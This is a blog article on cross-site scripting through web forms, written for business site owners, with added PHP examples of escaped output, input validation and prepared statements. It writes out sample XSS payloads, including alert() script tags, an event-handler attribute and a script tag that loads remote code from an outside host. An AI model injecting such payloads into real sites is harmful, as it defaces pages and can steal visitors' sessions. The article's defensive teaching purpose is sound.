Yahoo, Google, Facebook and other big sites are being attacked and your website could be next…
Nerds like me know it’s about XSS. For customers, it’s about unethical business practice.
Last Sunday, I stumbled upon a business investment website. When I was on its homepage, an image suddenly popped up covering at least 1/4 of the screen.
I have seen sites like that before, using popups to grow their own opt-in mailing list, but this one was different. Guess what? It was a porn image popping out of an investment website's homepage.
You ask what a porn image has to do with a business information website? Nothing at all, of course.
You ask why a business website would ever show such an indecent image right on their front page? Well, I believe they are not even aware of it.
During that instant, I imagined right away that other customers might have gone crazy upon seeing that image. They may even have complained or reported it to the operators of the site. But I tell you, the operators might not even know that the website had already become a "victim" of an XSS attack.
Even without inspecting the site, I already knew what took place. It was one of their web forms that was causing it.
I was actually scheduled to write an article on another topic, but I thought of writing about this, the XSS attack, which I think is a more timely matter. For business website owners and those who are planning to be one, I will have you know that your good name can be instantly tarnished just through your web forms.
I'm hoping that this article will give you ideas on how to XSS-proof your forms against such attacks in the future.
What is an XSS Attack?
An XSS attack, or Cross Site Scripting, has become so broad nowadays that it could mean many things. Personally, I will simply define it as a type of attack wherein someone injects malicious code into your website.
Code injection usually starts from a webpage where web forms exist. Examples of such pages are signup or registration forms, comment forms, contact forms and login forms.
To make it clearer, let me give you an example of an XSS attack:
Let's say you want to collect comments or feedback from your customers and you want the last 5 comments to appear on the homepage. So you put up a webpage where you allow your visitors to enter their comments in a text box and submit them by clicking a button. After submitting, they will be taken to another page where you say something like "thank you for participating".
So user A will put in this entry: <b>Your website is great! Well done.</b>. Another visitor, user B, will see that comment on the homepage in bold type. At this point you should see there's nothing wrong with it.
However, if user A puts in <script>alert('This is great');</script>, user B will see nothing in the comment section; instead he will see an alert box with a message.
At this point something is going wrong, because the comment should be showing inside the comment box rather than in an alert box.
But let's say user A has entered something like <script>alert('BOO');</script>. Ahh, that's the time you get worried, because every time someone accesses your homepage, everyone gets a negative message.
Now here's where serious things can happen: user A can enter something like <script src="pornsite.com/porn.js"></script>. Boom! As soon as this script reaches the homepage, everyone accessing the website will see something that is not relevant to the website. The script will run code from another site and allow it to load its own content into your site. The message could be porn ads, it could be a racist message, or worse, it could be stealing your customers' session access.
Anyone Can Do It
Someone doesn't need to be a Harvard graduate in computer science to know how to attack one's web forms. Even innocent people may not realize that they have just performed an XSS attack on the site they are using, simply by copying and pasting data into your forms.
Accept it. It’s a reality in cyber space.
Building a business website takes a lot of hard work and dedication. For some it takes years to build momentum before they achieve measurable success, only to have all their hard work go down the drain because of such rampant acts on the Internet nowadays.
You don't want this to happen to your site. When these things happen, most likely your customers will leave your site with a bad impression of your business, and might even tell others. This may mean lasting damage to your reputation.
What to do to protect your business website?
1. Test, test, test. If you're planning to start up a forum on your website, do a test.
Put this little script in the text entry form:
<script>alert('hello');</script>
If an alert message appears upon viewing the thread, then the forum software that you have just installed is vulnerable to XSS attacks.
Do this test with the rest of your forms.
2. Filter any entry from your forms. Just like in a business built on brick and mortar, owners don't mind hiring security personnel to guard the main gate against unauthorized people entering their premises, as long as it protects their business. From the customers' standpoint this helps build confidence too, because customers think you are concerned for them.
The same holds true if you're doing business online. The main door through which an XSS attack enters your website is your forms.
So in any of your web forms, do not allow users to use tags in their entries. At the most, the only tags that you should allow in entries should be those that are known to be very safe, such as <b>, <strong>, <u>, <em>, etc.
Do not allow <script></script> in the data, as it is the most notorious among the tags as far as XSS is concerned.
If you’re using PHP to create webpages, filtering data can be made simpler by using the strip_tags() function.
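The following PHP is an added example, not code from the article: it renders a stored comment the vulnerable way described in the comment-box scenario above, next to a hardened version that escapes the whole comment with htmlspecialchars() and then re-enables only the literal, attribute-free tags the article lists as safe. The sample comments are constructed. One caveat worth knowing: strip_tags() with an allowed-tags list keeps the attributes of the tags it allows (PHP's documentation notes this), so on its own it is not enough; the hardened function sidesteps that by whitelisting exact tag strings.

```php
<?php
// Added example (not from the original article): a stored-comment display
// in the vulnerable form the article describes, beside a hardened version.
// The $samples below are constructed input, not real data.

declare(strict_types=1);

// Vulnerable: echoes the stored comment as-is, so any <script> one visitor
// submitted runs in every other visitor's browser.
function renderCommentVulnerable(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// Hardened: escape everything for HTML first, then re-enable an exact
// whitelist of harmless, attribute-free tags. Tags are matched literally,
// so a tag carrying any attribute stays escaped and is shown as text.
function renderCommentSafe(string $comment): string
{
    $allowed = ['b', 'strong', 'u', 'em', 'i'];

    $escaped = htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    foreach ($allowed as $tag) {
        $escaped = str_replace(
            ["&lt;$tag&gt;", "&lt;/$tag&gt;"],
            ["<$tag>", "</$tag>"],
            $escaped
        );
    }
    return '<div class="comment">' . $escaped . '</div>';
}

// Why not strip_tags($comment, '<b><strong><u><em>')? It removes the
// disallowed tags but leaves attributes on the allowed ones untouched
// (PHP documents this), so an event-handler attribute on <b> would survive.

$samples = [
    '<b>Your website is great! Well done.</b>',   // the harmless comment
    "<script>alert('BOO');</script>",              // the article's example
    '<b onmouseover="alert(1)">hover me</b>',      // attribute on an allowed tag
];

foreach ($samples as $s) {
    echo 'Vulnerable: ' . renderCommentVulnerable($s) . PHP_EOL;
    echo 'Safe:       ' . renderCommentSafe($s) . PHP_EOL . PHP_EOL;
}
```

Run it with `php comment_demo.php`: the first sample renders in bold in both versions, while the second and third come out of renderCommentSafe() as inert text (`&lt;script&gt;...`), which is exactly the outcome the article's "Test, test, test" step checks for.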
3. Moderate user entries. Never allow entries to be published unless you preview the content. However, if you are receiving high-volume traffic, you might find this task laborious. In cases like these, make sure that you never allow HTML tags and JavaScript code in the entries.
4. Always validate entries. More often than not, forms are created to gather information that is later saved in a database. Before you put anything into the database, make sure to follow my suggestions below:
- If you’re asking for an email address, make sure it’s in the correct format.
- If you're asking for a first name and last name, make sure they consist of alphabetic characters only. If you're asking for telephone numbers, make sure your user enters numeric characters only.
- If you’re asking for long text such as comments, do not allow tags as explained above.
- If you’re asking for date, make sure to validate the date.
In programming, double and single quotes have a special purpose: they separate the data from the command. If you escape these special characters, you are telling the interpreter that the entry is data and not a command to be executed. Escaping makes the injected code useless, so it will not run.
In PHP coding, escaping can be as simple as invoking the addslashes() function, which will turn ' into \'. If data is to be entered into a MySQL database, you can use the mysql_real_escape_string() function instead.
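The following PHP is an added example, not the article's code, carrying the four validation rules above through a complete submission and then storing it. It assumes PHP 7.1 or later with the pdo_sqlite extension; the in-memory database, table name and the $submitted array are constructed for the demonstration. Two caveats a practitioner would want alongside the escaping advice: addslashes() and mysql_real_escape_string() address the SQL context only (the mysql_* functions were removed in PHP 7, and a prepared statement is the current way to keep data separate from the command), and for HTML output the corresponding escape is htmlspecialchars(), not addslashes().

```php
<?php
// Added example (not from the original article): validate the fields the
// article lists, then store the record with a prepared statement.
// Assumes PHP >= 7.1 with pdo_sqlite; all sample values are constructed.

declare(strict_types=1);

// Returns [list of error strings, tag-stripped comment].
function validateSubmission(array $in): array
{
    $errors = [];

    // Email: let PHP's own validator judge the format.
    if (filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email: not a valid address';
    }

    // First/last name: letters only, as the article's rule says (note this
    // rejects names such as O'Brien; relax the pattern if that matters to you).
    foreach (['firstname', 'lastname'] as $field) {
        if (!preg_match('/^[A-Za-z]{1,60}$/', $in[$field] ?? '')) {
            $errors[] = "$field: letters only";
        }
    }

    // Telephone: digits only (ctype_digit('') is false, so empty fails too).
    if (!ctype_digit($in['phone'] ?? '')) {
        $errors[] = 'phone: digits only';
    }

    // Date: must parse as YYYY-MM-DD and be a real calendar date. PHP rolls
    // 2023-02-30 over to 2023-03-02, so the round-trip comparison catches it.
    $raw = $in['date'] ?? '';
    $d = DateTime::createFromFormat('!Y-m-d', $raw);
    if ($d === false || $d->format('Y-m-d') !== $raw) {
        $errors[] = 'date: use YYYY-MM-DD';
    }

    // Free text: strip every tag, as the article advises for comments.
    // strip_tags() keeps the text between tags, only the tags themselves go.
    $comment = strip_tags($in['comment'] ?? '');

    return [$errors, $comment];
}

// Store with a prepared statement: the values never become part of the SQL
// text, which is the separation addslashes()/mysql_real_escape_string()
// tried to achieve by hand.
function storeSubmission(PDO $db, array $in, string $comment): int
{
    $stmt = $db->prepare(
        'INSERT INTO entries (email, firstname, lastname, phone, entry_date, comment)
         VALUES (:email, :fn, :ln, :phone, :d, :comment)'
    );
    $stmt->execute([
        ':email' => $in['email'], ':fn' => $in['firstname'], ':ln' => $in['lastname'],
        ':phone' => $in['phone'], ':d' => $in['date'], ':comment' => $comment,
    ]);
    return (int) $db->lastInsertId();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE entries (id INTEGER PRIMARY KEY, email TEXT, firstname TEXT,
           lastname TEXT, phone TEXT, entry_date TEXT, comment TEXT)');

// Constructed form submission: valid fields, plus a comment that carries
// both a script tag and quotes.
$submitted = [
    'email'     => 'jane@example.com',
    'firstname' => 'Jane',
    'lastname'  => 'Doe',
    'phone'     => '5551234567',
    'date'      => '2024-02-29',
    'comment'   => "Great site! <script>alert('x')</script> It's \"quoted\".",
];

[$errors, $comment] = validateSubmission($submitted);
if ($errors !== []) {
    echo 'Rejected: ' . implode('; ', $errors) . PHP_EOL;
} else {
    $id = storeSubmission($db, $submitted, $comment);
    echo "Stored entry #$id with comment: $comment" . PHP_EOL;
}

// For comparison, what the article's addslashes() does to quotes:
echo addslashes("It's \"quoted\"") . PHP_EOL;   // It\'s \"quoted\"
```

The quotes in the comment reach the database intact because the prepared statement, not string escaping, keeps them from being read as SQL; the addslashes() line at the end is only there to show the transformation the article mentions.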
Do your homework.
If you have been attracting huge traffic to your site, chances are at least one of your visitors will try to use your traffic for their own ends, or simply annoy you with a scripting attack that makes you look stupid or bad in front of your customers. Don't give them a chance to ruin your good name. Always remember to implement security on your entry points – your forms.
However, XSS is a broad topic; it doesn't only involve injecting code via forms, and it is beyond the scope of this article to discuss every variant one by one. I would recommend you read more about XSS by searching for articles on Google.
Do you feel your website is safe?